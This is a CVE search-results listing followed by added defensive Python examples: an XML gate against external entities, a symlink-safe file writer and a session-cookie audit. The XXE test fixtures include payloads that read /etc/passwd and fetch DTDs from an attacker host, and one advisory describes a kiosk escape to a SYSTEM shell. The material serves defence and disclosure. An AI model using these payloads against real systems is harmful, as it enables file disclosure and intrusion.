Search Results (2948 CVEs found)
| CVE | Vendors | Products | Updated | CVSS v3.1 | Description |
|---|---|---|---|---|---|
| CVE-2024-1329 | 1 Hashicorp | 1 Nomad | 2024-11-21 | 7.7 High | The template renderer in HashiCorp Nomad and Nomad Enterprise 1.5.13 up to 1.6.6, and 1.7.3, is vulnerable to arbitrary file write on the host as the Nomad client user through symlink attacks. This vulnerability, CVE-2024-1329, is fixed in Nomad 1.7.4, 1.6.7, and 1.5.14. |
| CVE-2024-0943 | 1 Totolink | 2 N350rt, N350rt Firmware | 2024-11-21 | 3.7 Low | A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. |
| CVE-2024-0942 | 1 Totolink | 2 N200re-v5, N200re-v5 Firmware | 2024-11-21 | 3.7 Low | A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. |
| CVE-2023-6836 | 1 Wso2 | 7 Api Manager, Api Manager Analytics, Api Microgateway and 4 more | 2024-11-21 | 4.6 Medium | Multiple WSO2 products have been identified as vulnerable to an XML External Entity (XXE) attack, which abuses a widely available but rarely used feature of XML parsers to access sensitive information. |
| CVE-2023-6721 | 1 Europeana | 1 Repox | 2024-11-21 | 8.3 High | An XXE vulnerability has been found in Repox, which allows a remote attacker to interfere with the application's XML data processing in the fileupload function, resulting in interaction between the attacker and the server's file system. |
| CVE-2023-6280 | 1 52north | 1 Wps | 2024-11-21 | 7.2 High | An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. It allows an attacker to use external entities in its WebProcessingService servlet to retrieve files by making HTTP requests to the internal network. |
| CVE-2023-6194 | 1 Eclipse | 1 Memory Analyzer | 2024-11-21 | 2.8 Low | In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report, then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition. |
| CVE-2023-5889 | 1 Pkp | 1 Pkp Web Application Library | 2024-11-21 | 8.2 High | Insufficient Session Expiration in GitHub repository pkp/pkp-lib prior to 3.3.0-16. |
| CVE-2023-5866 | 1 Phpmyfaq | 1 Phpmyfaq | 2024-11-21 | 5.7 Medium | Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository thorsten/phpmyfaq prior to 3.2.1. |
| CVE-2023-5865 | 1 Phpmyfaq | 1 Phpmyfaq | 2024-11-21 | 9.8 Critical | Insufficient Session Expiration in GitHub repository thorsten/phpmyfaq prior to 3.2.2. |
| CVE-2023-5838 | 1 Linkstack | 1 Linkstack | 2024-11-21 | 9.8 Critical | Insufficient Session Expiration in GitHub repository linkstackorg/linkstack prior to v4.2.9. |
| CVE-2023-5035 | 1 Moxa | 2 Eds-g503, Eds-g503 Firmware | 2024-11-21 | 3.1 Low | A vulnerability has been identified in PT-G503 Series firmware versions prior to v5.2, where the Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the cookie to be transmitted in plaintext over an HTTP session. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation. |
| CVE-2023-52252 | 1 Unifiedremote | 1 Unified Remote | 2024-11-21 | 9.8 Critical | Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint. |
| CVE-2023-51772 | 1 Oneidentity | 1 Password Manager | 2024-11-21 | 8.8 High | One Identity Password Manager before 5.13.1 allows Kiosk Escape. This product enables users to reset their Active Directory passwords on the login screen of a Windows client. It launches a Chromium based browser in Kiosk mode to provide the reset functionality. The escape sequence is: wait for a session timeout, click on the Help icon, observe that there is a browser window for the One Identity website, navigate to any website that offers file upload, navigate to cmd.exe from the file explorer window, and launch cmd.exe as NT AUTHORITY\SYSTEM. |
| CVE-2023-50936 | 1 Ibm | 1 Powersc | 2024-11-21 | 6.3 Medium | IBM PowerSC 1.3, 2.0, and 2.1 does not invalidate the session after logout, which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 275116. |
| CVE-2023-50304 | 1 Ibm | 2 Engineering Requirements Management Doors, Engineering Requirements Management Doors Web Access | 2024-11-21 | 7.1 High | IBM Engineering Requirements Management DOORS Web Access 9.7.2.8 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 273335. |
| CVE-2023-4704 | 1 Instantcms | 1 Instantcms | 2024-11-21 | 4.9 Medium | External Control of System or Configuration Setting in GitHub repository instantsoft/icms2 prior to 2.16.1-git. |
| CVE-2023-4654 | 1 Instantcms | 1 Instantcms | 2024-11-21 | 3.5 Low | Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository instantsoft/icms2 prior to 2.16.1. |
| CVE-2023-4560 | 1 Omeka | 1 Omeka S | 2024-11-21 | 6.5 Medium | Improper Authorization of Index Containing Sensitive Information in GitHub repository omeka/omeka-s prior to 4.0.4. |
| CVE-2023-4218 | 1 Eclipse | 3 Eclipse Ide, Org.eclipse.core.runtime, Pde | 2024-11-21 | 5 Medium | In Eclipse IDE versions < 2023-09 (4.29) some files with XML content are parsed in a way that is vulnerable to all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example, to review a foreign repository or patch). |
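The six XXE entries in this result set (WSO2, Repox, 52North WPS, Eclipse Memory Analyzer, IBM DOORS Web Access, Eclipse IDE) share one root cause: an XML parser that resolves DOCTYPE-declared external entities. The Eclipse Memory Analyzer entry describes the fix as filtering input so that DTD references to external entities are prohibited. The following is an added example of such a pre-parse gate, written here for illustration and not taken from any of the listed products. It uses only the Python standard library's expat bindings, which never fetch an external entity unless an `ExternalEntityRefHandler` is installed, so the check itself cannot be tricked into reading a file or making a request. Function names, the entity-count limit and the sample payloads are this example's own.

```python
"""Pre-parse gate that rejects XML carrying DTD external entity references.

Added example, not code from any product listed above.  Run it in front of
whatever parser the application really uses: it inspects the DOCTYPE and
entity declarations and raises before any external entity could be resolved.
"""
import xml.parsers.expat


class ExternalEntityError(ValueError):
    """The document declares a DTD that could pull in external data."""


def reject_external_entities(data: bytes, allow_internal_dtd: bool = False,
                             max_internal_entities: int = 10) -> None:
    """Raise ExternalEntityError if `data` declares an external DTD, an external
    general or parameter entity, more than `max_internal_entities` internal
    entities (entity-expansion DoS), or, by default, any DOCTYPE at all.

    Expat resolves no external entity unless an ExternalEntityRefHandler is
    installed, and none is, so this pass touches neither disk nor network.
    """
    parser = xml.parsers.expat.ParserCreate()
    internal_count = 0

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            raise ExternalEntityError(
                f"external DTD in DOCTYPE {name!r}: {system_id or public_id}")
        if not allow_internal_dtd:
            raise ExternalEntityError(f"DOCTYPE {name!r} not permitted")

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id,
                       notation):
        nonlocal internal_count
        # SYSTEM/PUBLIC entities have a system or public id and value None; a
        # resolving parser would read them from disk or the network.
        if system_id is not None or public_id is not None:
            kind = "parameter" if is_parameter else "general"
            raise ExternalEntityError(
                f"external {kind} entity {name!r} -> {system_id or public_id}")
        internal_count += 1
        if internal_count > max_internal_entities:
            raise ExternalEntityError(
                f"more than {max_internal_entities} internal entities declared")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        # Not well-formed: surface it rather than pass a half-parsed document on.
        raise ExternalEntityError(f"not well-formed XML: {exc}") from exc


def is_safe(data: bytes, allow_internal_dtd: bool = False) -> bool:
    """Boolean wrapper around reject_external_entities()."""
    try:
        reject_external_entities(data, allow_internal_dtd)
    except ExternalEntityError:
        return False
    return True


# Constructed sample documents (not taken from any advisory).
CLEAN = b'<report><query>SELECT 1</query></report>'
INTERNAL_ONLY = b'<!DOCTYPE r [<!ENTITY greet "hi">]><r>&greet;</r>'
XXE_FILE = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM '
            b'"file:///etc/passwd">]><r>&x;</r>')
XXE_EXTERNAL_DTD = b'<!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><r/>'
XXE_PARAM = (b'<!DOCTYPE r [<!ENTITY % p SYSTEM "http://attacker.example/p.dtd">'
             b'%p;]><r/>')
ENTITY_FLOOD = (b'<!DOCTYPE r [' + b''.join(b'<!ENTITY e%d "x">' % i
                                            for i in range(20)) + b']><r/>')

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN), ("internal", INTERNAL_ONLY),
                       ("file", XXE_FILE), ("ext-dtd", XXE_EXTERNAL_DTD),
                       ("param", XXE_PARAM), ("flood", ENTITY_FLOOD)]:
        print(f"{label:9} strict={is_safe(doc)!s:5} "
              f"internal_dtd_ok={is_safe(doc, allow_internal_dtd=True)}")
```

The strict mode (no DOCTYPE at all) is the right default for machine-generated formats such as report definitions or API payloads; `allow_internal_dtd=True` is only for inputs that legitimately use internal entities, and even then the entity-count cap keeps expansion attacks out. The gate complements, not replaces, disabling entity resolution in the real parser.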
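The Nomad entry (CVE-2024-1329) is an instance of a generic bug: a privileged writer follows a symlink that the unprivileged owner of the destination directory planted, and so writes a host file instead of the intended one. The following added example shows the hardening pattern in Python; it is not Nomad's code and makes no claim about how Nomad fixed the issue. Every directory component is opened with `O_DIRECTORY|O_NOFOLLOW` relative to the previous directory descriptor and the leaf with `O_NOFOLLOW`, so the kernel performs the symlink check and the open atomically and a link cannot be swapped in between a check and the write. The function names and the constructed task-directory scenario in `demo()` are this example's own; it needs Linux or macOS for `dir_fd` support.

```python
"""Symlink-resistant file write confined to a base directory.

Added example, not Nomad's code.  safe_write() refuses '..', absolute paths,
and any symlink in the path, and rejects a pre-planted hard link as well.
"""
import errno
import os
import shutil
import stat
import tempfile


class UnsafePathError(PermissionError):
    """The destination would escape base_dir or pass through a link."""


def safe_write(base_dir: str, rel_path: str, data: bytes) -> int:
    """Write `data` to base_dir/rel_path without following any symlink.

    Returns the number of bytes written.  Intermediate directories must exist.
    """
    parts = [p for p in rel_path.split("/") if p not in ("", ".")]
    if not parts or ".." in parts or rel_path.startswith("/"):
        raise UnsafePathError(f"refusing path outside base dir: {rel_path!r}")

    dir_fd = os.open(base_dir, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for comp in parts[:-1]:
            # O_NOFOLLOW only covers the last component of a path, so walk the
            # components one at a time, each relative to the previous directory fd.
            nxt = os.open(comp, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW,
                          dir_fd=dir_fd)
            os.close(dir_fd)
            dir_fd = nxt
        # No O_TRUNC here: the target is inspected before anything is altered.
        fd = os.open(parts[-1], os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0o644,
                     dir_fd=dir_fd)
    except OSError as exc:
        if exc.errno == errno.ELOOP:  # a symlink sat where a directory/file should be
            raise UnsafePathError(f"symlink in {rel_path!r}") from exc
        raise
    finally:
        os.close(dir_fd)

    try:
        st = os.fstat(fd)
        # O_NOFOLLOW stops symlinks but not hard links: if base_dir shares a
        # filesystem with sensitive host files, a planted hard link would still
        # redirect the write.  Refuse anything that is not a single-link regular file.
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
            raise UnsafePathError(f"{rel_path!r} is not a plain single-link file")
        os.ftruncate(fd, 0)
        return os.write(fd, data)
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed scenario: a task dir seeded with a file symlink and a directory
    symlink pointing at a file outside it, as a low-privilege user could plant."""
    host_dir = tempfile.mkdtemp()
    task_dir = tempfile.mkdtemp()
    results = {}
    try:
        host_secret = os.path.join(host_dir, "authorized_keys")
        with open(host_secret, "wb") as f:
            f.write(b"original\n")
        os.mkdir(os.path.join(task_dir, "out"))
        os.symlink(host_secret, os.path.join(task_dir, "local"))   # leaf symlink
        os.symlink(host_dir, os.path.join(task_dir, "secrets"))    # directory symlink

        results["plain"] = safe_write(task_dir, "out/rendered.conf", b"ok")
        for rel in ("local", "secrets/authorized_keys", "../escape", "/etc/x"):
            try:
                safe_write(task_dir, rel, b"attacker\n")
                results[rel] = "written"
            except UnsafePathError:
                results[rel] = "blocked"
        with open(host_secret, "rb") as f:
            results["host_file_intact"] = f.read() == b"original\n"
        with open(os.path.join(task_dir, "out", "rendered.conf"), "rb") as f:
            results["rendered"] = f.read()
    finally:
        shutil.rmtree(host_dir)
        shutil.rmtree(task_dir)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

If the writer must also create intermediate directories, create them with `os.mkdir(..., dir_fd=dir_fd)` inside the same walk rather than with `os.makedirs` on a string path, which would follow links again.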
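Three entries above (phpMyFAQ CVE-2023-5866, Moxa CVE-2023-5035, InstantCMS CVE-2023-4654) carry the same CWE-614 title, "Sensitive Cookie in HTTPS Session Without 'Secure' Attribute". They are found the same way, by reading the `Set-Cookie` headers an HTTPS login returns. The following added audit routine is this editor's example, not code from any of those projects; the `Set-Cookie` samples are constructed, and the name heuristic for "session-like" cookies is an assumption to adjust per application. It also reports missing `HttpOnly` and `SameSite`, which a practitioner checks in the same pass.

```python
"""Flag session cookies set without Secure, HttpOnly or SameSite.

Added example (not from phpMyFAQ, Moxa or InstantCMS).  Feed audit_all() the
Set-Cookie header values of a real HTTPS login response to use it.
"""
import re

# Heuristic: cookie names that usually carry a session or auth token.
SESSION_NAME_HINTS = re.compile(r"sess|sid|token|auth|login", re.IGNORECASE)


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie value into name, value, boolean flags and key=value
    attributes.  Flag and attribute names compare case-insensitively (RFC 6265)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    flags, attrs = set(), {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_value, val = part.partition("=")
        if has_value:
            attrs[key.strip().lower()] = val.strip()
        else:
            flags.add(key.strip().lower())
    return {"name": name.strip(), "value": value, "flags": flags, "attrs": attrs}


def audit_cookie(header: str, over_https: bool = True) -> list:
    """Findings for one Set-Cookie header; empty if clean or not session-like."""
    cookie = parse_set_cookie(header)
    name = cookie["name"]
    if not SESSION_NAME_HINTS.search(name):
        return []
    findings = []
    if over_https and "secure" not in cookie["flags"]:
        # The CWE-614 condition: the browser will also attach this cookie to any
        # plain http:// request to the same host, exposing the session.
        findings.append(f"{name}: missing Secure")
    if "httponly" not in cookie["flags"]:
        findings.append(f"{name}: missing HttpOnly")
    if cookie["attrs"].get("samesite", "").lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite not Lax/Strict")
    return findings


def audit_all(headers, over_https: bool = True) -> dict:
    """Map each session-like cookie name to its findings (clean cookies map to [])."""
    report = {}
    for header in headers:
        name = parse_set_cookie(header)["name"]
        if SESSION_NAME_HINTS.search(name):
            report[name] = audit_cookie(header, over_https)
    return report


# Constructed sample headers, the kind an HTTPS login response might return.
SAMPLE_HEADERS = [
    "PHPSESSID=7d9f0c1b; Path=/; HttpOnly",
    "sid=4f2a9e; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/; Expires=Wed, 21 Oct 2026 07:28:00 GMT",
]

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_HEADERS).items():
        print(name, "->", findings or "ok")
```

Pass `over_https=False` when auditing a plain-HTTP deployment so that the missing `Secure` flag is not reported as a finding there; the `Insufficient Session Expiration` entries in the same list are a separate server-side check (does the session id stop working after logout) that no header audit can replace.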